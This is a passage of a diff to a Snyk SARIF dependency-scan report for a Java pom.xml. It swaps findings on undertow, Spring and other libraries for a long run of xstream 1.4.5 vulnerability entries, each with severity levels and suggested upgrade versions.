-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a medium severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
+              "physicalLocation": {
+                "artifactLocation": {
+                  "uri": "pom.xml"
+                },
+                "region": {
+                  "startLine": 1
+                }
               },
               "logicalLocations": [
                 {
@@ -4094,7 +870,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.20"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.14"
               },
               "artifactChanges": [
                 {
@@ -4107,7 +883,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.20"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.14"
                       }
                     }
                   ]
@@ -4117,7 +893,7 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-460764",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1051966",
           "level": "warning",
           "message": {
             "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a medium severity vulnerability."
@@ -4142,7 +918,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.7"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.15"
               },
               "artifactChanges": [
                 {
@@ -4155,7 +931,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.7"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.15"
                       }
                     }
                   ]
@@ -4165,10 +941,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-8352924",
-          "level": "error",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1051967",
+          "level": "warning",
           "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a medium severity vulnerability."
           },
           "locations": [
             {
@@ -4190,199 +966,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.21"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.21"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-IOUNDERTOW-12458577",
-          "level": "error",
-          "message": {
-            "text": "This file introduces a vulnerable io.undertow:undertow-core package with a high severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "io.undertow:undertow-core@2.3.10.Final"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-undertow@3.4.11"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-undertow@3.4.11"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-IOUNDERTOW-6567186",
-          "level": "error",
-          "message": {
-            "text": "This file introduces a vulnerable io.undertow:undertow-core package with a high severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "io.undertow:undertow-core@2.3.10.Final"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-undertow@3.1.12"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-undertow@3.1.12"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-IOUNDERTOW-6669948",
-          "level": "error",
-          "message": {
-            "text": "This file introduces a vulnerable io.undertow:undertow-core package with a high severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "io.undertow:undertow-core@2.3.10.Final"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-undertow@3.1.9"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-undertow@3.1.9"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-IOUNDERTOW-7300152",
-          "level": "error",
-          "message": {
-            "text": "This file introduces a vulnerable io.undertow:undertow-core package with a high severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "io.undertow:undertow-core@2.3.10.Final"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-undertow@3.2.10"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.15"
               },
               "artifactChanges": [
                 {
@@ -4395,7 +979,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-undertow@3.2.10"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.15"
                       }
                     }
                   ]
@@ -4405,10 +989,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-IOUNDERTOW-7300153",
-          "level": "error",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088328",
+          "level": "warning",
           "message": {
-            "text": "This file introduces a vulnerable io.undertow:undertow-core package with a high severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a medium severity vulnerability."
           },
           "locations": [
             {
@@ -4422,7 +1006,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "io.undertow:undertow-core@2.3.10.Final"
+                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
                 }
               ]
             }
@@ -4430,7 +1014,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-undertow@3.2.10"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.16"
               },
               "artifactChanges": [
                 {
@@ -4443,7 +1027,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-undertow@3.2.10"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.16"
                       }
                     }
                   ]
@@ -4453,10 +1037,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-IOUNDERTOW-7361775",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088329",
           "level": "warning",
           "message": {
-            "text": "This file introduces a vulnerable io.undertow:undertow-core package with a medium severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a medium severity vulnerability."
           },
           "locations": [
             {
@@ -4470,7 +1054,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "io.undertow:undertow-core@2.3.10.Final"
+                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
                 }
               ]
             }
@@ -4478,7 +1062,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-undertow@3.1.9"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.16"
               },
               "artifactChanges": [
                 {
@@ -4491,7 +1075,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-undertow@3.1.9"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.16"
                       }
                     }
                   ]
@@ -4501,10 +1085,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-IOUNDERTOW-7433721",
-          "level": "note",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088331",
+          "level": "warning",
           "message": {
-            "text": "This file introduces a vulnerable io.undertow:undertow-core package with a low severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a medium severity vulnerability."
           },
           "locations": [
             {
@@ -4518,7 +1102,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "io.undertow:undertow-core@2.3.10.Final"
+                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
                 }
               ]
             }
@@ -4526,7 +1110,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-undertow@3.3.7"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.16"
               },
               "artifactChanges": [
                 {
@@ -4539,7 +1123,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-undertow@3.3.7"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.16"
                       }
                     }
                   ]
@@ -4549,10 +1133,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-IOUNDERTOW-7707751",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088332",
           "level": "warning",
           "message": {
-            "text": "This file introduces a vulnerable io.undertow:undertow-core package with a medium severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a medium severity vulnerability."
           },
           "locations": [
             {
@@ -4566,7 +1150,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "io.undertow:undertow-core@2.3.10.Final"
+                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
                 }
               ]
             }
@@ -4574,7 +1158,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-undertow@3.2.10"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.16"
               },
               "artifactChanges": [
                 {
@@ -4587,7 +1171,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-undertow@3.2.10"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.16"
                       }
                     }
                   ]
@@ -4597,10 +1181,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-IOUNDERTOW-7984545",
-          "level": "error",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088333",
+          "level": "warning",
           "message": {
-            "text": "This file introduces a vulnerable io.undertow:undertow-core package with a high severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a medium severity vulnerability."
           },
           "locations": [
             {
@@ -4614,7 +1198,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "io.undertow:undertow-core@2.3.10.Final"
+                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
                 }
               ]
             }
@@ -4622,7 +1206,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-undertow@3.1.9"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.16"
               },
               "artifactChanges": [
                 {
@@ -4635,7 +1219,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-undertow@3.1.9"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.16"
                       }
                     }
                   ]
@@ -4645,10 +1229,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-IOUNDERTOW-8383402",
-          "level": "error",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088334",
+          "level": "warning",
           "message": {
-            "text": "This file introduces a vulnerable io.undertow:undertow-core package with a critical severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a medium severity vulnerability."
           },
           "locations": [
             {
@@ -4662,7 +1246,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "io.undertow:undertow-core@2.3.10.Final"
+                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
                 }
               ]
             }
@@ -4670,7 +1254,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-undertow@3.1.9"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.16"
               },
               "artifactChanges": [
                 {
@@ -4683,7 +1267,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-undertow@3.1.9"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.16"
                       }
                     }
                   ]
@@ -4692,11 +1276,11 @@
             }
           ]
         },
-        {
-          "ruleId": "SNYK-JAVA-ORGAPACHECOMMONS-10734078",
-          "level": "error",
+        {
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088335",
+          "level": "warning",
           "message": {
-            "text": "This file introduces a vulnerable org.apache.commons:commons-lang3 package with a high severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a medium severity vulnerability."
           },
           "locations": [
             {
@@ -4710,7 +1294,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "org.apache.commons:commons-lang3@3.12.0"
+                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
                 }
               ]
             }
@@ -4718,7 +1302,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.apache.commons:commons-lang3@3.18.0"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.16"
               },
               "artifactChanges": [
                 {
@@ -4731,7 +1315,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.apache.commons:commons-lang3@3.18.0"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.16"
                       }
                     }
                   ]
@@ -4741,10 +1325,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-ORGBITBUCKETBC-6139942",
-          "level": "error",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088336",
+          "level": "warning",
           "message": {
-            "text": "This file introduces a vulnerable org.bitbucket.b_c:jose4j package with a high severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a medium severity vulnerability."
           },
           "locations": [
             {
@@ -4758,7 +1342,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "org.bitbucket.b_c:jose4j@0.9.3"
+                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
                 }
               ]
             }
@@ -4766,7 +1350,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.bitbucket.b_c:jose4j@0.9.4"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.16"
               },
               "artifactChanges": [
                 {
@@ -4779,7 +1363,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.bitbucket.b_c:jose4j@0.9.4"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.16"
                       }
                     }
                   ]
@@ -4789,10 +1373,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-ORGJBOSSXNIO-6403375",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088337",
           "level": "error",
           "message": {
-            "text": "This file introduces a vulnerable org.jboss.xnio:xnio-api package with a high severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
           },
           "locations": [
             {
@@ -4806,7 +1390,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "org.jboss.xnio:xnio-api@3.8.8.Final"
+                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
                 }
               ]
             }
@@ -4814,7 +1398,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-undertow@3.2.10"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.16"
               },
               "artifactChanges": [
                 {
@@ -4827,7 +1411,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-undertow@3.2.10"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.16"
                       }
                     }
                   ]
@@ -4837,10 +1421,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-ORGJRUBY-10074039",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088338",
           "level": "warning",
           "message": {
-            "text": "This file introduces a vulnerable org.jruby:jruby package with a medium severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a medium severity vulnerability."
           },
           "locations": [
             {
@@ -4854,7 +1438,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "org.jruby:jruby@9.4.3.0"
+                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
                 }
               ]
             }
@@ -4862,7 +1446,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.asciidoctor:asciidoctorj@3.0.1"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.16"
               },
               "artifactChanges": [
                 {
@@ -4875,7 +1459,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.asciidoctor:asciidoctorj@3.0.1"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.16"
                       }
                     }
                   ]
@@ -4885,34 +1469,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-ORGJRUBY-10557729",
-          "level": "error",
-          "message": {
-            "text": "This file introduces a vulnerable org.jruby:jruby-stdlib package with a high severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "org.jruby:jruby-stdlib@9.4.3.0"
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-10345766",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1294540",
           "level": "warning",
           "message": {
-            "text": "This file introduces a vulnerable org.springframework:spring-web package with a medium severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a medium severity vulnerability."
           },
           "locations": [
             {
@@ -4926,7 +1486,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "org.springframework:spring-web@6.0.13"
+                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
                 }
               ]
             }
@@ -4934,7 +1494,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-web@3.3.13"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.17"
               },
               "artifactChanges": [
                 {
@@ -4947,7 +1507,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-web@3.3.13"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.17"
                       }
                     }
                   ]
@@ -4957,10 +1517,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-12008931",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569176",
           "level": "error",
           "message": {
-            "text": "This file introduces a vulnerable org.springframework:spring-beans package with a high severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
           },
           "locations": [
             {
@@ -4974,7 +1534,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "org.springframework:spring-beans@6.0.13"
+                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
                 }
               ]
             }
@@ -4982,7 +1542,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.9"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.18"
               },
               "artifactChanges": [
                 {
@@ -4995,7 +1555,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-web@3.4.9"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.18"
                       }
                     }
                   ]
@@ -5005,10 +1565,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-12817817",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569177",
           "level": "error",
           "message": {
-            "text": "This file introduces a vulnerable org.springframework:spring-core package with a high severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
           },
           "locations": [
             {
@@ -5022,7 +1582,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "org.springframework:spring-core@6.0.13"
+                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
                 }
               ]
             }
@@ -5030,7 +1590,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-test@3.4.10"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.18"
               },
               "artifactChanges": [
                 {
@@ -5043,7 +1603,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-test@3.4.10"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.18"
                       }
                     }
                   ]
@@ -5053,10 +1613,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6091650",
-          "level": "warning",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569178",
+          "level": "error",
           "message": {
-            "text": "This file introduces a vulnerable org.springframework:spring-web package with a medium severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
           },
           "locations": [
             {
@@ -5070,7 +1630,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "org.springframework:spring-web@6.0.13"
+                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
                 }
               ]
             }
@@ -5078,7 +1638,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-web@3.1.6"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.18"
               },
               "artifactChanges": [
                 {
@@ -5091,7 +1651,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-web@3.1.6"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.18"
                       }
                     }
                   ]
@@ -5101,10 +1661,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569179",
           "level": "error",
           "message": {
-            "text": "This file introduces a vulnerable org.springframework:spring-web package with a high severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
           },
           "locations": [
             {
@@ -5118,7 +1678,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "org.springframework:spring-web@6.0.13"
+                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
                 }
               ]
             }
@@ -5126,7 +1686,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-web@3.1.9"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.18"
               },
               "artifactChanges": [
                 {
@@ -5139,7 +1699,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-web@3.1.9"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.18"
                       }
                     }
                   ]
@@ -5149,10 +1709,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569180",
           "level": "error",
           "message": {
-            "text": "This file introduces a vulnerable org.springframework:spring-web package with a high severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
           },
           "locations": [
             {
@@ -5166,7 +1726,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "org.springframework:spring-web@6.0.13"
+                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
                 }
               ]
             }
@@ -5174,7 +1734,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-web@3.1.10"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.18"
               },
               "artifactChanges": [
                 {
@@ -5187,7 +1747,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-web@3.1.10"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.18"
                       }
                     }
                   ]
@@ -5197,10 +1757,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6597980",
-          "level": "warning",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569181",
+          "level": "error",
           "message": {
-            "text": "This file introduces a vulnerable org.springframework:spring-web package with a medium severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
           },
           "locations": [
             {
@@ -5214,7 +1774,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "org.springframework:spring-web@6.0.13"
+                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
                 }
               ]
             }
@@ -5222,7 +1782,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-web@3.1.11"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.18"
               },
               "artifactChanges": [
                 {
@@ -5235,7 +1795,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-web@3.1.11"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.18"
                       }
                     }
                   ]
@@ -5245,10 +1805,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-7687447",
-          "level": "warning",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569182",
+          "level": "error",
           "message": {
-            "text": "This file introduces a vulnerable org.springframework:spring-web package with a medium severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
           },
           "locations": [
             {
@@ -5262,7 +1822,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "org.springframework:spring-web@6.0.13"
+                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
                 }
               ]
             }
@@ -5270,7 +1830,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.9"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.18"
               },
               "artifactChanges": [
                 {
@@ -5283,7 +1843,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-web@3.2.9"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.18"
                       }
                     }
                   ]
@@ -5293,10 +1853,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-7945490",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569183",
           "level": "error",
           "message": {
-            "text": "This file introduces a vulnerable org.springframework:spring-webmvc package with a high severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
           },
           "locations": [
             {
@@ -5310,7 +1870,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "org.springframework:spring-webmvc@6.0.13"
+                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
                 }
               ]
             }
@@ -5318,7 +1878,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.10"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.18"
               },
               "artifactChanges": [
                 {
@@ -5331,7 +1891,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-web@3.2.10"
